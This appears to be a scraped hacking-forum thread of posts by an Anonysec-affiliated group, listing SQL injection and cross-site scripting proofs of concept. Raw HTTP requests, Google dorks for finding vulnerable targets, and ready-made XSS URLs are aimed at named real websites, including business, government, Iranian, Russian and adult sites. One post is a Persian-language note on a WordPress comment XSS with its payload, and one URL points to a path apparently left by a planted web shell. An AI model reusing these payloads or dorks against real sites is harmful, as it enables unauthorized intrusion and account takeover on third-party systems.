1=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1 http://site.com/user.php?user=1 and 1=2 http://site.com/user.php?user=1 union select 1,2-- http://site.com/user.php?user=-1 OR 17-7=10 1=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1 0 [+] Reflected XSS Cross Site Scripting [+] 0 1=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1 Affected path(s):login.php search.text.general.php login.php?operation=get_email register.php ========================== HTTP REQUEST XSS 1 ============================== Host site.com User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us Accept-Encoding: gzip, deflate Referer: http://site.com/login.php Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 113 POST: operation=login&username='"><img+src=x+onerror=prompt(1337);>&password=&auto_login=on&x=0&y=0 XSS Proof Image: http://i.imgur.com/VmbmuiZ.png ============================================================================ ========================== HTTP REQUEST XSS 2 ============================== Host: site.com User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us Accept-Encoding: gzip, deflate Referer: http://site.com/search.text.general.php Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 109 POST: search_string='"><script>alert('1337')</script>&search_type=¤t_user=all&x=0&y=0 XSS Proof Image: http://i.imgur.com/PDcO50Y.png ============================================================================ ========================== HTTP REQUEST XSS 3 ============================== Host: site.com User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us Accept-Encoding: gzip, deflate Referer: http://site.com/login.php?operation=get_email Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 91 POST: operation=send_info&email='"><script>alert('1337')</script>&x=0&y=0 XSS Proof Image: http://i.imgur.com/MFc5unu.png ============================================================================ ========================== HTTP REQUEST XSS 4 ============================== Host: site.com User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us Accept-Encoding: gzip, deflate Referer: http://site.com/register.php Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 207 POST: username='"><img+src=x+onerror=prompt(1337);>&password_1=&password_2=&first_name=&last_name=&email=&url=&phone=&company=&address1=&address2=&city=&zipcode=&state=null&country=null&x=0&y=0 XSS Proof Image: http://i.imgur.com/7T4WZMW.png ============================================================================ 1=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1 0 [+] Persistent XSS Cross Site Scripting [+] 0 1=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1 Affected path(s):album.add.php?parent= ========================== HTTP REQUEST XSS 5 ============================== Host: site.com User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us Accept-Encoding: gzip, deflate Referer: http://site.com/album.add.php?parent= Cookie: po_session_id=701cc0e40cd083390368f49206b4ccbd Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 132 POST: album_caption='"><script>alert('1337')</script>&parent=null&album_access_rights=3&album_description=&x=0&y=0 XSS Proof Image: http://i.imgur.com/TrzBqXJ.png ============================================================================ -------------------------------------------------------------------------------------------- ####################################################### Anonysec hacker iranin ######################################################## ======================================================= # Discovered by : Rednofozi #--tnx to : ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow http://www.exploit4arab.org/exploits/2026
  16. Rednofozi

    Pro-Exploit

    [+] Title :- AKP Meda Design Admin Panel XSS [+] Date :- 2018-09-10 [+] Exploit Author :- Rednofozi [+] Vendor Homepage :-N/A [+] Version :- All Versions [+] Tested on :- Linux - Windows [+] Category :- webapps [+] Google Dorks :- N/A [+] Team name :- Anonysec.org [+] Official Website :- nadaram :d [+] Contact :- Rednofozi@yahoo.com ========================================================= ######################################################## Developers: VNSinfo/akpwork App Version: All Vuln: /admin/index.php?msg=<HERE> Example List \/ Example 1: http://www.insightradiology.com.au/admin/index.php?msg=<svg/onload=alert(document.domain)> Example 2: http://thedukehotel.com.au/admin/?msg=%3Csvg/onload=alert(document.domain)%3E Example 3: http://gremarine.com.au/admin/?msg=%3Csvg/onload=alert(document.domain)%3E Example 4: http://worklocker.com.au/admin/index.php?msg=%3Csvg/onload=alert(document.domain)%3E Example 5: http://www.fxma.com.au/admin/?msg=%3Csvg/onload=alert(document.domain)%3E Examples End /\ ####################################################### Anonysec hacker iranin ######################################################## ======================================================= # Discovered by : Rednofozi #--tnx to : ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow http://www.exploit4arab.org/exploits/2024
  17. Moeein Seven

    Hacking-Penetration testing to the site

    // Reflected XSS in AdultJoy (Adult website) // Site URL: http://adultjoy.net/ Vulnerable PHP: search.php Vulnerable URL: http://adultjoy.net/search.php?search= Payload Used: %3Csvg/onload=(confirm)()%3E PoC Url: http://adultjoy.net/search.php?search=%3Csvg/onload=(confirm)()%3E Found by: da74
  18. // Reflected XSS in PornZebra Search Engine // Site URL: http://pornzebra.com/ Vulnerable PHP: search.php Vulnerable URL: http://pornzebra.com/search.php?q= Payload Used: %3Csvg/onload=(confirm)()%3E PoC Url: http://pornzebra.com/search.php?q=%3Csvg/onload=(confirm)()%3E Found by: da74
  19. Rednofozi

    Pro-Exploit

    ############################################ # Title :Russia site view.php XSS Vulnerability # Author :Rednofozi # category : webapps # Tested On : Win 8 , Kali Linux # team:https://anonysec.org # me : Rednofozi@yahoo.com # Vendor HomePage :photolipetsk.ru # Google Dork: inurl:''/.view.php?PID= /view.php?PID=' site:ru ############################################ # search google Dork : inurl:''/.view.php?PID= /view.php?PID=' site:ru ####################Proof of Concept ############# #Demo : https://photolipetsk.ru/view.php?pid=57472&cat=12' (xxs Vulnerability) <script>alert("rednofozi")</script> # Discovered by : Rednofozi #tnx to : ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow http://www.exploit4arab.org/exploits/1984
  20. ############################################ # Title : user and password of the American Recovery site XSS Vulnerability # Author :Rednofozi # category : webapps # Tested On : Win 8 , Kali Linux # my team:https://anonysec.org # me : Rednofozi@yahoo.com # Vendor HomePage :https://www.diamondcard.us # Google Dork: inurl:''/.php?pass=' site:us ############################################ # search google Dork :inurl:''/.php?pass=' site:us ####################Proof of Concept ############# #Demo and test : https://www.diamondcard.us/download/api/example.php' (xxsVulnerability) <script>alert("rednofozi")</script> # Discovered by : Rednofozi #--tnx to : ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow http://www.exploit4arab.org/exploits/1982
  21. Rednofozi

    Pro-Exploit

    ############################################ # Title :CMd npal XSS Vulnerability # Author :anonysec # category : webapps # Tested On : Win 8 , Kali Linux # team:https://anonysec.org # me : Rednofozi@yahoo.com # Vendor HomePage :http://ag.gov.np # Google Dork: inurl:''/.php?cmd=' site:np ############################################ # search google Dork : inurl:''/.php?cmd=' site:np ####################Proof of Concept ############# #Demo : http://ag.gov.np/cgialfa/alfasymlink/alfaperl.txt/home/pahsgov11/public_html/noscript.php' (xxsVulnerability) <script>alert("rednofozi")</script> # Discovered by : Rednofozi #tnx to : ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow http://www.exploit4arab.org/exploits/1981
  22. Rednofozi

    Pro-Exploit

    http://www.exploit4arab.org/exploits/1979 ############################################ # Title : Designed by YouBon XSS Vulnerability # Author :Rednofozi # category : webapps # Tested On : Win 8 , Kali Linux # my team:https://anonysec.org # me : Rednofozi@yahoo.com # Vendor HomePage :https://www.youbon.ir # Google Dork: 'inurl:''/details.php?id='' site:ir' ############################################ # search google Dork :'inurl:''/details.php?id='' site:ir' ####################Proof of Concept ############# #Demo : https://www.youbon.ir/product-details.php?id=2037' (xxsVulnerability) <script>alert("rednofozi")</script> # Discovered by : Rednofozi #--tnx to : ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow
  23. ############################################ # Title : Designed by iran sites XSS Vulnerability # Author :Rednofozi # category : webapps # Tested On : Win 8 , Kali Linux # my team:https://anonysec.org # me : Rednofozi@yahoo.com # Vendor HomePage :http://www.belkad.ir # Google Dork: inurl:''/details.php?id='' site:ir ############################################ # search google Dork :inurl:''/details.php?id='' site:ir ####################Proof of Concept ############# #Demo : http://www.belkad.ir/article-details.php?id=139' (xxsVulnerability) <script>("rednofozi")</script> # Discovered by : Rednofozi #--tnx to : ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow http://www.exploit4arab.org/exploits/1977
  24. Rednofozi

    Pro-Exploit

    ############################################ # Title : resaneh-fc.ir XSS Vulnerability # Author :Rednofozi # category : webapps # Tested On : Win 8 , Kali Linux # my team:https://anonysec.org # me : Rednofozi@yahoo.com # Vendor HomePage :resaneh-fc.ir # Google Dork: N/A ############################################ # search google Dork : N/A ####################Proof of Concept ############# #Demo : http://resaneh-fc.ir/details.php?id=67_0_3_0_C' (xxsVulnerability) اسپریکت باگ xxs رو داخل نت سر چ کنید # Discovered by : Rednofozi #--tnx to : ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow
  25. Rednofozi

    Hacking-Bugs

    مهاجم با ارسال کد جاوا اسکریپت در قسمت نظرات میتواند کنترل وب سایت وردپرسی را در دست بگیرد. با حفره Cross Site Script مهاجم می تواند رمز عبور مدیر را تغییر یا حساب کاربری جدیدی در سایت ایجاد کند و یا انجام هر چیز دیگری که مدیر در حال حاضر وارد شده می تواند بر روی سیستم هدف انجام دهد در حال حاضر وردپرس ورژن های 4.2, 4.1.2, 4.1.1, 3.9.3. تمامی آسیب پذیر میباشد. <a title='x onmouseover=alert(unescape(/hello%20world/.source)) style=position:absolute;left:0;top:0;width:5000px;height:5000px AAAAAAAAAAAA...[64 kb]..AAA'></a>